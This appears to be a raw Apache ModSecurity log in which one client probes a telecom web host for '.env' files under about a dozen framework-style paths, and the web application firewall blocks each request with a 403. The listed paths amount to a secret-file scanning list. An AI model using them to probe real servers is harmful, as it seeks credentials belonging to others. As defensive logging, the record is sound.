[Mon May 11 15:50:14.998726 2026] [security2:error] [pid 1319998:tid 1320009] [client 54.211.142.83:52058] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /saas/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/saas/.env"] [unique_id "agHelqt2WtvoFr7xvGzcygAAAIk"]
[Mon May 11 15:50:14.999224 2026] [security2:error] [pid 1319998:tid 1320009] [client 54.211.142.83:52058] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/saas/.env"] [unique_id "agHelqt2WtvoFr7xvGzcygAAAIk"]
[Mon May 11 15:50:14.999448 2026] [security2:error] [pid 1319998:tid 1320009] [client 54.211.142.83:52058] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/saas/.env"] [unique_id "agHelqt2WtvoFr7xvGzcygAAAIk"]
[Mon May 11 15:50:15.093037 2026] [security2:error] [pid 1319998:tid 1320009] [client 54.211.142.83:52058] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /client/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/client/.env"] [unique_id "agHel6t2WtvoFr7xvGzcywAAAIk"]
[Mon May 11 15:50:15.093509 2026] [security2:error] [pid 1319998:tid 1320009] [client 54.211.142.83:52058] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/client/.env"] [unique_id "agHel6t2WtvoFr7xvGzcywAAAIk"]
[Mon May 11 15:50:15.093719 2026] [security2:error] [pid 1319998:tid 1320009] [client 54.211.142.83:52058] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/client/.env"] [unique_id "agHel6t2WtvoFr7xvGzcywAAAIk"]
[Mon May 11 15:50:15.199195 2026] [security2:error] [pid 1319998:tid 1320009] [client 54.211.142.83:52058] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /project/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/project/.env"] [unique_id "agHel6t2WtvoFr7xvGzczAAAAIk"]
[Mon May 11 15:50:15.199684 2026] [security2:error] [pid 1319998:tid 1320009] [client 54.211.142.83:52058] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/project/.env"] [unique_id "agHel6t2WtvoFr7xvGzczAAAAIk"]
[Mon May 11 15:50:15.199914 2026] [security2:error] [pid 1319998:tid 1320009] [client 54.211.142.83:52058] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/project/.env"] [unique_id "agHel6t2WtvoFr7xvGzczAAAAIk"]
[Mon May 11 15:50:15.293010 2026] [security2:error] [pid 1319998:tid 1320009] [client 54.211.142.83:52058] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /admin-panel/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/admin-panel/.env"] [unique_id "agHel6t2WtvoFr7xvGzczQAAAIk"]
[Mon May 11 15:50:15.293504 2026] [security2:error] [pid 1319998:tid 1320009] [client 54.211.142.83:52058] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/admin-panel/.env"] [unique_id "agHel6t2WtvoFr7xvGzczQAAAIk"]
[Mon May 11 15:50:15.293803 2026] [security2:error] [pid 1319998:tid 1320009] [client 54.211.142.83:52058] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/admin-panel/.env"] [unique_id "agHel6t2WtvoFr7xvGzczQAAAIk"]
[Mon May 11 15:50:15.386404 2026] [security2:error] [pid 1319998:tid 1320009] [client 54.211.142.83:52058] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /control-panel/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/control-panel/.env"] [unique_id "agHel6t2WtvoFr7xvGzczgAAAIk"]
[Mon May 11 15:50:15.386939 2026] [security2:error] [pid 1319998:tid 1320009] [client 54.211.142.83:52058] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/control-panel/.env"] [unique_id "agHel6t2WtvoFr7xvGzczgAAAIk"]
[Mon May 11 15:50:15.387177 2026] [security2:error] [pid 1319998:tid 1320009] [client 54.211.142.83:52058] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/control-panel/.env"] [unique_id "agHel6t2WtvoFr7xvGzczgAAAIk"]
[Mon May 11 15:50:15.483287 2026] [security2:error] [pid 1319998:tid 1320009] [client 54.211.142.83:52058] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /user-panel/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/user-panel/.env"] [unique_id "agHel6t2WtvoFr7xvGzczwAAAIk"]
[Mon May 11 15:50:15.483776 2026] [security2:error] [pid 1319998:tid 1320009] [client 54.211.142.83:52058] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/user-panel/.env"] [unique_id "agHel6t2WtvoFr7xvGzczwAAAIk"]
[Mon May 11 15:50:15.484008 2026] [security2:error] [pid 1319998:tid 1320009] [client 54.211.142.83:52058] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/user-panel/.env"] [unique_id "agHel6t2WtvoFr7xvGzczwAAAIk"]
[Mon May 11 15:50:15.579765 2026] [security2:error] [pid 1319998:tid 1320009] [client 54.211.142.83:52058] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /node/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/node/.env"] [unique_id "agHel6t2WtvoFr7xvGzc0QAAAIk"]
[Mon May 11 15:50:15.580242 2026] [security2:error] [pid 1319998:tid 1320009] [client 54.211.142.83:52058] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/node/.env"] [unique_id "agHel6t2WtvoFr7xvGzc0QAAAIk"]
[Mon May 11 15:50:15.580507 2026] [security2:error] [pid 1319998:tid 1320009] [client 54.211.142.83:52058] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/node/.env"] [unique_id "agHel6t2WtvoFr7xvGzc0QAAAIk"]
[Mon May 11 15:50:15.674572 2026] [security2:error] [pid 1319998:tid 1320009] [client 54.211.142.83:52058] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /express/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/express/.env"] [unique_id "agHel6t2WtvoFr7xvGzc0gAAAIk"]
[Mon May 11 15:50:15.675063 2026] [security2:error] [pid 1319998:tid 1320009] [client 54.211.142.83:52058] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/express/.env"] [unique_id "agHel6t2WtvoFr7xvGzc0gAAAIk"]
[Mon May 11 15:50:15.675304 2026] [security2:error] [pid 1319998:tid 1320009] [client 54.211.142.83:52058] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/express/.env"] [unique_id "agHel6t2WtvoFr7xvGzc0gAAAIk"]
[Mon May 11 15:50:15.766782 2026] [security2:error] [pid 1319998:tid 1320009] [client 54.211.142.83:52058] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /next/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/next/.env"] [unique_id "agHel6t2WtvoFr7xvGzc0wAAAIk"]
[Mon May 11 15:50:15.767196 2026] [security2:error] [pid 1319998:tid 1320009] [client 54.211.142.83:52058] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/next/.env"] [unique_id "agHel6t2WtvoFr7xvGzc0wAAAIk"]
[Mon May 11 15:50:15.767387 2026] [security2:error] [pid 1319998:tid 1320009] [client 54.211.142.83:52058] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/next/.env"] [unique_id "agHel6t2WtvoFr7xvGzc0wAAAIk"]
[Mon May 11 15:50:15.871082 2026] [security2:error] [pid 1319998:tid 1320009] [client 54.211.142.83:52058] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /nuxt/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/nuxt/.env"] [unique_id "agHel6t2WtvoFr7xvGzc1AAAAIk"]
[Mon May 11 15:50:15.871520 2026] [security2:error] [pid 1319998:tid 1320009] [client 54.211.142.83:52058] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/nuxt/.env"] [unique_id "agHel6t2WtvoFr7xvGzc1AAAAIk"]
[Mon May 11 15:50:15.871742 2026] [security2:error] [pid 1319998:tid 1320009] [client 54.211.142.83:52058] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/nuxt/.env"] [unique_id "agHel6t2WtvoFr7xvGzc1AAAAIk"]
[Mon May 11 15:50:15.968248 2026] [security2:error] [pid 1319998:tid 1320009] [client 54.211.142.83:52058] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /nest/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/nest/.env"] [unique_id "agHel6t2WtvoFr7xvGzc1QAAAIk"]
[Mon May 11 15:50:15.968732 2026] [security2:error] [pid 1319998:tid 1320009] [client 54.211.142.83:52058] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/nest/.env"] [unique_id "agHel6t2WtvoFr7xvGzc1QAAAIk"]
[Mon May 11 15:50:15.968943 2026] [security2:error] [pid 1319998:tid 1320009] [client 54.211.142.83:52058] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/nest/.env"] [unique_id "agHel6t2WtvoFr7xvGzc1QAAAIk"]
[Mon May 11 15:50:16.060379 2026] [security2:error] [pid 1319998:tid 1320009] [client 54.211.142.83:52058] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /react/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/react/.env"] [unique_id "agHemKt2WtvoFr7xvGzc1gAAAIk"]
[Mon May 11 15:50:16.060813 2026] [security2:error] [pid 1319998:tid 1320009] [client 54.211.142.83:52058] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/react/.env"] [unique_id "agHemKt2WtvoFr7xvGzc1gAAAIk"]
[Mon May 11 15:50:16.061009 2026] [security2:error] [pid 1319998:tid 1320009] [client 54.211.142.83:52058] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/react/.env"] [unique_id "agHemKt2WtvoFr7xvGzc1gAAAIk"]
[Mon May 11 15:50:16.152624 2026] [security2:error] [pid 1319998:tid 1320009] [client 54.211.142.83:52058] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /vue/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/vue/.env"] [unique_id "agHemKt2WtvoFr7xvGzc1wAAAIk"]
[Mon May 11 15:50:16.153127 2026] [security2:error] [pid 1319998:tid 1320009] [client 54.211.142.83:52058] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/vue/.env"] [unique_id "agHemKt2WtvoFr7xvGzc1wAAAIk"]
[Mon May 11 15:50:16.153377 2026] [security2:error] [pid 1319998:tid 1320009] [client 54.211.142.83:52058] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/vue/.env"] [unique_id "agHemKt2WtvoFr7xvGzc1wAAAIk"]
